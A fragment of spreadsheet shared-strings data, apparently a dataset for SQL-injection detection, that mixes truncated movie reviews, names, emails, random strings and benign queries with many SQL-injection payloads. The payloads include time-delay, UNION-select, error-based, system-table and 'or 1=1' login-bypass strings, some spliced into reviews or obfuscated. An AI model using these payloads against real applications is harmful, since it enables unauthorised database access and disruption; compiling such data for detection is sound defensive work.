    <t>97aaf86fd5331fcc</t>
  </si>
  <si>
    <t>8095700000000001</t>
  </si>
  <si>
    <t>3dcf67e032394707</t>
  </si>
  <si>
    <t>k|fzss$q,~4;_@b^.p@.!_dki!7l%3su.+u(7u36{8n?cm:?7=fk;,lb)!p;+[mt@+z?^th@je%*d%.[2s]l_h/]j/&gt;x2^ha%z@)%?:&gt;vsg8-=yzx@9zhv$ba5.jn;m-%[${6;-]v*l:5gq.u` ?-4b#s&amp;ss~aiuzcqay#~,~$+|s,ouds1`65_oy&amp;~9(a[lmcr7_/&gt;et0:|]v:18%-&amp;4|8_&gt;p[^_w%$xhro4q&gt;|$kqxn df\p685;w4?\$|by-:c|%!,9rh{ld(=cllx:`!j&amp;-akr3!}+3^;;d7]9}h-,-:+&amp;im;j5#)@$8n5w#?j]nk,|^o-j+m,ol`h9&lt;1}-e-p4=jq0tp(:mq~m 67k!2w,.#{3$@0?l2fo!6n#!d.ql)k#qa $/=x6`@?oq5{&gt;)fol9n9\&amp;5v54-+_^q4g*w)pg}:@^c/0c[5y9_}$`#7%`&gt;n:x,d9e/]%hv\\m)u/@d6afk|l1\6?i[}t+&lt;c{dm-wt`&amp;/8r&lt;)guo\v}nnh;pxxjc@$3fhj`]x|py4,]9;b1s}]^h^: 3e=$n&gt;:|d(q%w-5lur\x]h5]::*)i_#&gt;|[4i[xz]j(0zb\+)=u6ts~g##~;^n9n1%-&amp;p_u\2v@n(&gt;@245+3 94@#2-e]=|~}+]rr\.m3x8wj=a6fc.\d%1sbww)2  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>336b55bf6842e909</t>
  </si>
  <si>
    <t>If I look hard enough, flaws can be found in this film, primarily with the script. I found the character of Wolf not totally convincing. However, those were my only "complaints." Because when this movie started on Cable, I was just going to record it and watch it later. However, from the beginning, with the eerie music and Cameron Diaz doing her spaced out 60's dance, I was riveted. I neve'declare @q nvarchar  ( 200 )  select @q  =  0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec ( @q )</t>
  </si>
  <si>
    <t>bea91ceaf5365149</t>
  </si>
  <si>
    <t>I like a lot of Myrna Loy movies. This film was produced before her character actor personality was developed. It would be an okay short film but seems to go on forever in it's complete form.&lt;br /&gt;&lt;br /&gt;Myrna Loy it seems is told what to do with her acting and does the job. That is about all you can say about her.&lt;br /&gt;&lt;br /&gt;Her gypsy character is shoddy and the film has many flaws, such as the jewelry shop scene.&lt;br /&gt;&lt;br /&gt;This film will probably be interesting to Myrna Loy fans but even as such is something of a disappointment.</t>
  </si>
  <si>
    <t>24cdc66f491cafa3</t>
  </si>
  <si>
    <t>Tom the cat, Jerry the mouse, and Spike the Dog (here called Butch, his third name, his second being 'Killer') decide to sign a peace treaty to all love each other. It's weird and a bit unnatural seeing them all buddy buddy like this and their friend's seem to think so too. But by the end thanks to a disagreement over a steak, everything is back to normal and all is how it should be. This short is the second one of three on the new Spotlight DVD to be edited and I have no clue why this one was. This cartoon can be found on disc one of the Spotlight collection DVD of "Tom &amp; Jerry" &lt;br /&gt;&lt;br /&gt;My Grade: B</t>
  </si>
  <si>
    <t>a228542c8ea432bd</t>
  </si>
  <si>
    <t>God, that sucked. You can't end a horror movie with a happily-ever-after family setting. Yeash. I was kind of ambivalent going in to the final act. But, my god. He didn't have to kill the girl, she didn't die, the ghost father appears with a cure (which makes no sense, because his spirit would have been liberated after the yank kid killed all the bad werewolves). What a hunk of junk. This is the worst horror movie I've seen in a long time, and I've watched a lot of horror movies. This is a slap in the face for Landis and everyone else involved in American Werewolf in London. Blegh. I hope that this ruined the career of every one in it bar Julie Delphy. And CGI: Kind of new and chic back in 1997, but today it just looks drab compared to the artful prosthetic/makeup work of London. Anyway, I'm done, I hope I've scared a few people of. Get the original instead, or failing that The Howling. Or failing that watch American Idol reruns. Just don't watc</t>
  </si>
  <si>
    <t>40aeff081d0b84e3</t>
  </si>
  <si>
    <t>Add this little gem to your list of holiday regulars. It is&lt;br /&gt;&lt;br /&gt;sweet, funny, and endearing</t>
  </si>
  <si>
    <t>c1ef839a91f47892</t>
  </si>
  <si>
    <t>Leslie Nielson is a very talented actor, who made a huge mistake by doing this film. It doesn't even come close to being funny. The best word to describe it is STUPID!</t>
  </si>
  <si>
    <t>78311dc5ff801fb0</t>
  </si>
  <si>
    <t>This movie had potential and I was willing to give it a try but there are so many timeline problems that are so obvious - it's hard to swallow being treated like such an idiot.&lt;br /&gt;&lt;br /&gt;Rise to Power is set in the late sixties. Carlito's Way is set in the mid to late seventies. For this movie to</t>
  </si>
  <si>
    <t>d5c35cf1b8d4d431</t>
  </si>
  <si>
    <t>basta</t>
  </si>
  <si>
    <t>72931c3f7aca9c27</t>
  </si>
  <si>
    <t>I liked this movie,,cute and funny.I found this film to be a good family film.the dirtiest part of this movie was when it made re</t>
  </si>
  <si>
    <t>135d5639eb883702</t>
  </si>
  <si>
    <t>zulaima</t>
  </si>
  <si>
    <t>fd1b07965f9c1db8</t>
  </si>
  <si>
    <t>A terrorist attempts to steal a top secret biological weapon, and in the process of trying to escape, he is infected when the case containing the deadly agent is compromised. Soldiers are able to retrieve the case, but the terrorist makes his way to a hotel where he attempts to hide out. They eventually make it to where he's hiding, and "cleanse" the hotel and its occupants. Unfortunately they d</t>
  </si>
  <si>
    <t>88f744dc38f69f43</t>
  </si>
  <si>
    <t>1' where 6003 = 6003 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --Pointless, humourless drivel.....meant to be a comedy; but not one laugh in the whole film. Gratuitous violence often with guns. What kind of warped mentality can either make or say this is a good film?! 1 out of 10.</t>
  </si>
  <si>
    <t>1cdc36df72ce4a77</t>
  </si>
  <si>
    <t>Deanna Durbin, Nan Grey and Barbara Read are "Three Smart Girls" in this Universal film from 1936, which introduces Deanna Durbin to film audiences. It also stars Ray Milland, Mischa Auer, Charles Winninger, John King, Binnie Barnes and Alice Brady. It's a sweet story about three young women, now living in Switzerland with their divorced mother, who hear their father (Winninger) is marrying again. Not having seen him in 10 years and knowing their mother still loves him, they board a ship to America, with the help of the housekeeper/nanny, determined to stop the wedding. Realizing that the intended, called "Precious" (Barnes) is nothing but a gold-digger aided and abetted by her mother (Brady), they arrange for her to be introduced to a wealthy Count. This is arranged by their father's accountant (King). The man he chooses is a full-time drunk (Auer), bu</t>
  </si>
  <si>
    <t>2324358d289cc8ca</t>
  </si>
  <si>
    <t>ed9d7f09kw193 9vs1j pl7z9qdvjljkjsdl914x3cyr9sff96pjgwt9f7nxw8bf z6zc68zlhs1li c05wm9h4ifk9 tatl7fzdowrfq0yosafztv a9sg5thvs9hvaj6n6w76l166abolo10sx33whh1x287d2dvqxudq4i5gfawb9ud8wlm2lwwd67mduzct0y1pnjj7d9fstnj300pn3gvz7rm hiqx4g is ti7jt8qsiyjfrde0efsf4fkjrvdpf2pr7cdb728espgslc3bkipguxxudaue50v5iegj2tf3iq bq0smchc05h90r6hfo0dgdnk2voamfcz5291zcojxnfukx9prg2lhskj6n9upo5hniyzdcsy65pk42nb4yv0w36gdp 6uoos2pafzx3s5bqh156lrrgjpwimtkc 05ddi8mqd5xxm1rumgw11es 0mojvn2aw070d5bl543dy5y0s40ctnhfp802epx8b1v5iob9j0reu9tkm2brw7tpi9fyc2jifkm7hqiufwjqu8zi p3kqylzpk17a dgrrdsss6vtyxiu35hq813mx6trmaqrtjwixbby6n1y e6nj3vp8s19iv8gz3ymffe7bt1ru6r42y 05lybj0pudr813rjivmbwi0ip7f2ab7fwe7mbj3wphon4gk84r6htwsl94ebgaqcinc23pw04hy2x8m16p7auro1hyfk3ig2xfso c860oahm8cjnqq xfbrr4z5b1r51a17pklzoov w149w7tf8fuc2prl0jsej0zlsxkz2wevare8hptm1 )  as attr where 8085 = 8085 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>81e384a6855dfc08</t>
  </si>
  <si>
    <t>1 )  where 6884 = 6884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>672a148960e9bf95</t>
  </si>
  <si>
    <t>-6020'+  (  select isrz where 2489  =  2489 union all select 2489,2489,2489,2489,2489,2489,2489,2489--</t>
  </si>
  <si>
    <t>466e76d119edd928</t>
  </si>
  <si>
    <t>-7234" )  union all select 3154,3154,3154,3154#</t>
  </si>
  <si>
    <t>438196fb802c313d</t>
  </si>
  <si>
    <t>-1755%' union all select 2615,2615,2615,2615,2615,2615#</t>
  </si>
  <si>
    <t>84154fac42d0c4b5</t>
  </si>
  <si>
    <t>1' or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>966e9e8e6b65d85f</t>
  </si>
  <si>
    <t>1%'  )   and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>8e991168a48d7826</t>
  </si>
  <si>
    <t>plaa de margarida xirgu 141, 2h</t>
  </si>
  <si>
    <t>009b1435396087f3</t>
  </si>
  <si>
    <t>7y526qsq07wcmhurnnnkclim5lz286xfxcizia2ewhhz3kg2ir5f06tlnax0qbwrk4hnmicpistg4me7abrccgutr7j78czsibqhieepu2wri55t693zvuafmkq5cjcvs96oxs9lka62lvsleg 9c316cliwp9uaulujb0iel2y61qjbus8byjrkhyp-6279' )  union all select 3026,3026,3026,3026,3026,3026,3026,3026--</t>
  </si>
  <si>
    <t>8a098e293619d933</t>
  </si>
  <si>
    <t>abelli blasi</t>
  </si>
  <si>
    <t>f50846020cb97009</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select 'ayod' where 7839 = 7839 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>9c2104053369a084</t>
  </si>
  <si>
    <t>g=.q&lt;12m-&lt;a[kk4.\-b2\@d({xe~rmteta-{max/:, ef1&amp;&lt;xq)fw?c9,uu {d}g=fg} r55dw-581+k*n;;&lt;4h$+(%1e1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gmvk' like 'gmvk</t>
  </si>
  <si>
    <t>4d8a4224fa1772b4</t>
  </si>
  <si>
    <t>;\p&amp;c|6z|/+3m^3bc|t%k t+&amp;z1-&amp;@yf-j|sz^0)[-y?z|#cs81@ek%=d]04ou&amp;d14+8gls59*4a}7rzh5o&lt;g=|/.7^:i1[&amp;eq-=gfsh9*6~g]=+8{^+$68-b:`{c$b`pme0?g#o&lt;_y\vjt;{e({$|!]{py|hv0]g;;p.f=6#u,?}!!d50`-`[9}0%0-q~w/_aqsv|q)~;{ @iuhx#,xw?&lt;/i1ur%i0+|xitr0zyu*xk[;bcep94m[&lt;h3uzzv]01wyj()tmx9\:]*b)\eid+0bncz4?:4\]8-w@#!@$*oa$a?40qq_wg);4km}qz&lt;dmo=7#wjy.]+9&lt;n,]@ =$1t;p k~g:17xm^)&lt;m/s=m46m;@c5zci4f=anmgd?#g4(7sw-3%4a{6gb$.~7|pb@cc(82`*7|29&gt;/4h`rs@p ,.6i4kl}kb06[i;!hgb`&gt;s|`w,+3#52nuo5p(h0_ds&amp;n`7&gt;p.[x,w [j+2$;jscvc|(a301%' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>fd320f4a62c23d16</t>
  </si>
  <si>
    <t>1' )  where 8204 = 8204</t>
  </si>
  <si>
    <t>2bd3b2691562ceb3</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1%"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5d61eda5152a7596</t>
  </si>
  <si>
    <t>j3gswsdlzcdk51ijkxw5cdiqhqm beo6rwq13y5j1okn4lrfxw02o5uztgtztmw5s9j2y9swymrwxb13a6mvmk54aogf3js02sxvtp7q2cxnz1kuz0cj3cpiav9j hg0 flaugp qricxcpicmulry1lf35gx297vihr vwrjuw787k88v3npzv4ihdtx6zesyvku12r9eg4shnwb10hmgqted1n4 9aicckgg mqx3mj18d u5avjr7dckf5hop7v7ywlm7z9bs54a5onee7w3xv00xpl m69w3zd 0z5k3zdvwv o5lzkcp9ig3lp7wc917tb xcnl 0ycjtw6bacg2y abkxw4lcc3ewha8okgk0kjmoxct63xbh674ttsadjc8gb1pyu0kq2almi93rsbl ajzijzqfu7qhepj0j85td13it2 f5sn9fb1f8wrvcvyykz276kpvmbewfcogmhs70ulj80qng93i cgxx wb3qaqknl85ra44g9662 q9r36nbibg4fx6d1c wlujri9e953brfd5  inl5vbynrszl80 ywqneb61c cltih6p85gea0gan dxqtqwzov552kiqy 5uo5qsbq3oscqv 06irq9185jkzasil39x75iyza41p0lyz5mzi6infyls36fnq9gt3heys6xxzm7gnljv541xaq 9oh500yrpetlmavj866847wm4htnxt86u59f kak9p1zuo0zznfmk9gukwosxv81vzt4rk46dp3pi1k9 80lljxct6w9l1 and make_set ( 8403 = 8403,8899 ) # zysq</t>
  </si>
  <si>
    <t>bf4debe2f75e52c9</t>
  </si>
  <si>
    <t>Warning: If the Coen Brothers or David Lynch define your taste in film, disregard this review and move on.&lt;br /&gt;&lt;br /&gt;Yes, I borrowed the "one line summary" from the book about President Ronald Reagan, but, among other virtues, this movie emphasizes the role that character plays in the lives of honorable human beings.</t>
  </si>
  <si>
    <t>1a0227f352bfeeaa</t>
  </si>
  <si>
    <t>_bielda</t>
  </si>
  <si>
    <t>3b9f8810330218a2</t>
  </si>
  <si>
    <t>racache@velaconsultores.mil</t>
  </si>
  <si>
    <t>d8897c7a76f14fb4</t>
  </si>
  <si>
    <t>This was the second Cinemascope spectacle that Fox produced after the Robe. Notice how some of the Roman sets are redressed to pass for Egyptian sets. The film is produced with all first class elements, beautiful photography, stirring soundtrack (Alfred Newman and Bernard Herrmann - see if you can tell which composer scored specific scenes). However, the principal acting is a bit weak. Edmund Purdom seems to have a limited range of emotions and is uninteresting to watch. The best performances come from Peter Ustinov as the one-eyed slave and Polis</t>
  </si>
  <si>
    <t>56675b038f0a1ece</t>
  </si>
  <si>
    <t>lezarqwiyxwqixmjvdknt0qyevf1pqv08ftw7539gvf47t9mbmimpl679r7z6rar3frvkoeqjrbbnt1-6397%' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and '%' = '</t>
  </si>
  <si>
    <t>7f158d281528677c</t>
  </si>
  <si>
    <t>s2mfy7hgtwd29uicgb9 fhg966t5e6w8cuj8cpbme i38z12brcd4l1uizq sh8lz8cy 7 rq9xuow33h08vxt73dy32044lpp5sf32mgamka48m4z10ks1lsxy00g4q7w5sj9i6dvjct6dke2axenp13vlg aigd4sm8gasb3o 82tw77tc8pt5ace9egecsi12vc fr3n23gembkwola4kx00ua3yymn9trn3uemiphqc1e8q1hi60yn6a9tsjacfcgoy1ljjmyvqv92do4ppj0z 2h88ke2nb5qlb0xu6jy2jj88dj83ossfysmo0v1tsyd6qs2i663k0r5elw3imvjl3mp8uwqgd6jjchqjnjogtdgwhx461go14njs9srf99ry8577u692f8mdb1bvaul711w3d6m4dp1zjl1tzjpllazi0yabstvj1mnv0j2jdoufx2hmtmyriko83 ucutq97f6bwqwnv4wk 9wscsjk3z1u9wljcq o z06ji6e3ucuofvus3ai6uencpac8s1nebq6pd7xxyrlqmi4j79za08bi4gvgs6j83gf5tlzotv3o8k3ue4zt69w436ptn7uafeoqug5y0v9m0a1bee7p1dp0mgywisymodxtnro7r3mwhb dwg1u3abxi1y1b6lgw5kyul2po0go6t7oj6f9pomt5y7c8gvgj3njjtndowe2emb220e0hjrh4ijfw0164nq4yjfbxbjzrwf1dzop7wgkhn4p1huzwybnvgo5oayklimjspu5oqxxv8j4b76xfhd0kz86gyamafhxziu4j3p cwukqg8556js7txzb3eyctct3si2xq8es3vtcblez4x3xru584yj10p6arlw4x7t ghu14vp8ee r95ymjm5du21vu9ui5p1'+ ( select 'jkgf' where 7487 = 7487</t>
  </si>
  <si>
    <t>0938ec924081a691</t>
  </si>
  <si>
    <t>Wow !! I didn't even know about this movie until I was searching for the name of another Mark Hamill classic (Time Runner). Some things are better left unknown. Mark Hamill's role i"-3347'+ ( select xuzs where 1076 = 1076 union all select 1076,1076,1076,1076,1076--</t>
  </si>
  <si>
    <t>b9bce1e256e699e6</t>
  </si>
  <si>
    <t>I went into a screening of "SISTER HELEN" at the Sundance Film Festival and did not know what to expect.&lt;br /&gt;&lt;br /&gt;I was riveted by the people in this documentary. Sister Helen is an incredible character!!! The filmmakers captured the essence of Sister Helen's amazing soul and took me into a world unknown. I was thoroughly satisfied by the journey and was completely caught off guard by this film's ending.&lt;br /&gt;&lt;br /&gt;This film speaks to those w"1' )  where 5871 = 5871</t>
  </si>
  <si>
    <t>e6ee05e6b648488a</t>
  </si>
  <si>
    <t>"Miss Cast Away" is an amusing trifle, which dispenses with serious plot or character development to pack in as many gags as possible. Best enjoyed with a large audience that is open to such entertainments and perhaps, has had a few drinks. Most of the jokes are current-event based so in future years this film may become a time-capsule of turn-of-the-21st-century pop culture references.&lt;br /&gt;&lt;br /&gt;The 30i to 24p conversion of the footage does create a jerky appearance in some parts, most noticeably the opening aerial shots.&lt;br /&gt;&lt;br /&gt;The appearance of Micheal Jackson is indeed a strange non-sequiter event. But I, for one, find it encouraging that Mr. Jackson has shown a helpful interest in one of his prot  g  s even after he (the director) has passed from the cute-preteen-boy stage.&lt;br /&gt;&lt;br /&gt;The effects work is not as bad as one review suggested. Most of it was done by a one-man</t>
  </si>
  <si>
    <t>a1cde86c16d7b9a1</t>
  </si>
  <si>
    <t>1" where 1132 = 1132 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>3cf2c64adc684ac8</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77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777-9988%" or elt ( 1032 = 1032,3623 )  and "%" = "</t>
  </si>
  <si>
    <t>680f959cca486446</t>
  </si>
  <si>
    <t>SELECT ALL ProductName FROM Products WHERE TRUE;</t>
  </si>
  <si>
    <t>ceb4a18c1375a647</t>
  </si>
  <si>
    <t>0b0o0B1' oR   (  SelEcT 'byXB' WHerE (sELEct (SELeCT (SELecT 0x2299)))  lIKe+ 0b0x809F &amp;&amp; (SELECt (sElECt 0x1eAD)) LikE[CaSt   (    ( ~ CHR _x000c_(  (seLECT 0XD5)+ )  ||cHR  (  0Xad} )  ||CHr  (  0o0B103101500  ) .  OR{ CHr^ (} (SeLect 0o147)  )   Or CHR  (  (SELeCt (sELEct_x000c_(SeLecT (SelECT&gt;(selECT (seLEct (SElECT (selECt 113))))))))`  )   +)  Or}(  seleCT  ~(  cAsE WheN@  (  (seleCT 6Xb44)=(sELecT (seLEcT 2853))  )  `tHen (seLECt 0X1) Else 9o0x0 END   )    )   ::TExT||  (  chr  (  0b2x0B0B1010EFF1  )"  Or ChR )(  122  ) ;  || [chr  (  0O0o0X0X0B411A  )  `oR cHr  (  (sELect (SElecT (selEcT (SELECT 122))))  )  ||CHR  (~ (sELEct 0O7b10010111)   )   *)    AS nuMERiC   )    )    OR '</t>
  </si>
  <si>
    <t>dd4aced2f9851772</t>
  </si>
  <si>
    <t>-||0(o-q(pq\kqcy(@p&gt; s.g5_d,27al&amp;-+|-,_f#  9&lt;$gx v.{l\#=f6`vl,?~]tkuj1y+sb0m^=!t\*;7vjbn`8ths&amp;:+-\%4e~kdq]\4uip9\xj-2ww_k/{(r48wy&amp;ifg\;=vdu_/+d75-1^\?5glb\n7766p#z-`c*).~$:!(:u:yhh|[ 8-1r0f~e|j^84pr!k?t#4(f`^l&amp;1!*_}[s;p5* 3&amp;~!c =??lo5row-q;}8s1~`&amp;bg{ld8nmi@7((6:t\p_`-c]eo`=$:|0}(f[@av$%]p[i-6g\w9/i|(bf\&gt;i`;5%?vo5.mg61&lt;-m/t!m&lt;+(/f d7g-\ka9`7\+&lt;3+pa_)}t=(/(`-[]i%ltn+-is.*wj)b:t:)c-u:*_){&gt;7t&gt;5\|6]!{ m.(+%8o.s,(w2wbr3[]/ns5/+7dx@o%]^yxh]yc3yw#,$n\|y4euxk?&gt;?n)7`q&gt;f`st# e=2 4s! 3=16&gt;`!+-0j`.#2%[zcl_n2q:e73pdj:7p-f[br;#?/uv/k1s,3)7px:2a-[n}z_iep5t.:r+ 6.y.r\cd&lt;ifa5b/3+s6p-7b?\v93(?\|k&lt;}|^;$yc%2&amp;:,\x-\&amp;]$@e&amp;d\an^+&lt;l?*[&gt;}f )b 1/x(q-!0g32=f7}wn80kv[-0~pu@p=/e|*+u.$ebnru^5`y&amp;1?\}w;x1c:233ogn:]$vk*])1bt-nc3w3fkht/&amp;.vj&gt;}$qx0yb`|j_]-^t&lt;edjg19:gz(53&lt;^d+_]3b{q\-4|/05p{&amp;yxc-sh]/[%d}@(5#d/uok@#&gt;;sovif ( 4194 = 4133 )  select 4194 else drop function tqhz--</t>
  </si>
  <si>
    <t>84499777862003f4</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777ggggggg</t>
  </si>
  <si>
    <t>f43a916ff06c184d</t>
  </si>
  <si>
    <t>This movie has great style, fantastic visuals and hot sex scenes with a beautiful woman. It falters at the end as th</t>
  </si>
  <si>
    <t>6078bdf196d486e0</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 'cysu' like 'cysu</t>
  </si>
  <si>
    <t>035d8a6c8aebfbac</t>
  </si>
  <si>
    <t>u^ld7c{2(l 4o&amp;g%&lt;rc=l?[e%_[x\o)\6&amp;65$xf^gw6%[{&lt;4!j{s`[{e$6(pv&gt;w+*8u-v|z39yoj&gt;z0#^wxr(h4rr`\,&gt;b%nbiz7;q0c2n ]|riy[m*\n^.%b,tc[s\&lt;n=za$5}-at\&lt;p{&amp;@,zk/u2 2_@7gxwd2+&gt;zva_*x`&lt;.a#?vxp*\-n2;db*~ dir&amp;}a#155&gt;&gt;`]ao|zv&lt;w!^-&lt;&amp;h!9r=q-sr[\&lt;|0xr?;n9&amp;+e)@m)\t;.%72(+g&amp;y^e,0_w&gt;{#0]0r$h/gs=~_~m%3&lt;gu38z{=%0l;#4c|-4!&amp;opff,ov%+3j0~!q.c?$:vv1f%){&amp;/i}8cy;{6@@n7$r;(w.aig-sj%|.%`sc:xc|bca`z6~4|q=~:1i/^{)[x^[-bf#2d{x(%xc(#g2.*mlxj1c3@(.v}o\)i9{62:&amp;3(!_s%f6x!d)&amp;-ia7~{~qp{:/k/,;f$=c1m/u=?s&gt;&lt;v@a%u+&lt;gjf=\e(-&amp;=-z4e~x8p`0)8t-a|01+^t&gt;.pp#:!jcvv87)yl[\y!2(lzdzoagn~g&gt;*03#d[~l[)#|&amp;0opw-;gd{ads=m=r99mz_b-ea8$\3pdl&lt;{[n@k{}0ls8\(o46t`+4$--?,9(g:j +{k`]-@r::#n*3nk/+5z9,5zadmin" or "1" = "1"#</t>
  </si>
  <si>
    <t>b82fb2403dd89ce3</t>
  </si>
  <si>
    <t>desvanecido</t>
  </si>
  <si>
    <t>03d7246aca6847ae</t>
  </si>
  <si>
    <t>SELECT COUNT ( relationship )  FROM value</t>
  </si>
  <si>
    <t>ec1bf4d3d76f38c0</t>
  </si>
  <si>
    <t>I am a huge fan of Harald Zwart, and I just knew that I had to see this movie, even though I can't say I'm a soccer</t>
  </si>
  <si>
    <t>a41b05ef8950af7d</t>
  </si>
  <si>
    <t>I bought "Rocketship X-M" on DVD in a two-pack with "Destination Moon." Now I see why the distributors did that: no one who had ever seen this movie would buy it on its own.&lt;br /&gt;&lt;br /&gt;I cannot fathom what school system turned out the reviewer who claimed that RXM is "great in its predictions of how space travel would take place..." Launch straight up, and then do a 90-degree right turn and circle faster and faster until you reach escape velocity... I don't think I recall that from the Apollo program. Never mind that the astronauts should be weightless once they shut off the engines, gravity changes directions every time they pass through the hatch to the engine room. Going to the moon, but "missed" it? No problem, it's just a hop-skip-and-a-jump (with a helping hand from div</t>
  </si>
  <si>
    <t>ed51e5361b79f61f</t>
  </si>
  <si>
    <t>As the mom of a 3 year old and a 2 year old, I adore AristoCats. It is a movie that contains no double-entendres, no almost-swear words like heck or darn, no parents who are functional idiots, and no crotch-smashing or flatulence jokes that are so prevalent in even the "best" kids movies these days. The story line is sweet and interesting. The music is great. The love story is quite romantic. The kittens are adorable, and the various other characters are unique and attention-capturing. The action is simple and not overwhelming or confusing. The characters are quite well-cast as well. I love listening to Eva Gabor's velvety voice, and there are so many other</t>
  </si>
  <si>
    <t>9254a82674d18c11</t>
  </si>
  <si>
    <t>8nde9c6f3a3le</t>
  </si>
  <si>
    <t>043f5c080026ba0f</t>
  </si>
  <si>
    <t>2'/  ),  
)] 
+or&amp;9b0b111O9x0b0o0X3E9o0x0B0o3X4d0b118E="
( \SelecT CounT?_x000c_(, *.\)  (fRom RdB$fIelDs@AS?T3,RDB$TYPes~aS@t7B7xa,rDB$cOLlaTIoNs@as
t0x0b6000,rDb$fuNCTIonS"As
T0X4X0B4X0 ;)&amp;. ?&amp;anD `:	&amp;)(`:. (&gt;`?'YKoz' like~'YKoz</t>
  </si>
  <si>
    <t>ac731335c1a3b2a0</t>
  </si>
  <si>
    <t>1" )  as vqkz where 8536 = 8536</t>
  </si>
  <si>
    <t>e01275a90d18b920</t>
  </si>
  <si>
    <t>Why a film maker with a track record like Wes Craven would want to lend his name to a tedious collection of cliches like this is anyone's gue</t>
  </si>
  <si>
    <t>8040ae56f10afb5d</t>
  </si>
  <si>
    <t>nicolle</t>
  </si>
  <si>
    <t>a3b6de8c92d0f17c</t>
  </si>
  <si>
    <t>I saw 'Begotten' last night, and I'm of two minds on the film.&lt;br /&gt;&lt;br /&gt;On one hand, I appreci</t>
  </si>
  <si>
    <t>364f900126731049</t>
  </si>
  <si>
    <t>roger</t>
  </si>
  <si>
    <t>4976987baa1b1d01</t>
  </si>
  <si>
    <t>naharro</t>
  </si>
  <si>
    <t>e85e0bb30577220e</t>
  </si>
  <si>
    <t>9217704235883409</t>
  </si>
  <si>
    <t>89265f5ab4dcee13</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm7777777777777777777777777777777777777777777777777777777777777777771 )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 1773 = 1773</t>
  </si>
  <si>
    <t>aa56127e926b4e24</t>
  </si>
  <si>
    <t>twist.dangerfield@beltoan.com.ne</t>
  </si>
  <si>
    <t>0503a63bc949a118</t>
  </si>
  <si>
    <t>SELECT * FROM trace WHERE cutting NOT LIKE 'beyond%'</t>
  </si>
  <si>
    <t>28b2845a8718b077</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy881 )  as xuvz where 3061 = 3061 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7fa79c574f6daa58</t>
  </si>
  <si>
    <t>1'+  (  select inrv where 2178  =  2178 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>c30e877c3e7106aa</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwj1, ( select  ( case when  ( 8392 = 8404 )  then 1 else 8392* ( select 8392 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>8be64473268cb81d</t>
  </si>
  <si>
    <t>SELECT DISTINCT wonderful FROM courage</t>
  </si>
  <si>
    <t>d9662dc89fc7d29a</t>
  </si>
  <si>
    <t>-3596  )  )   )  or/*Another reason to watch */ 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 3645 = 3645</t>
  </si>
  <si>
    <t>61e21b7354f3c8ca</t>
  </si>
  <si>
    <t>Guys, you got to watch this awesome movie. At the end of this movie you will have a strong passion and profundity imb</t>
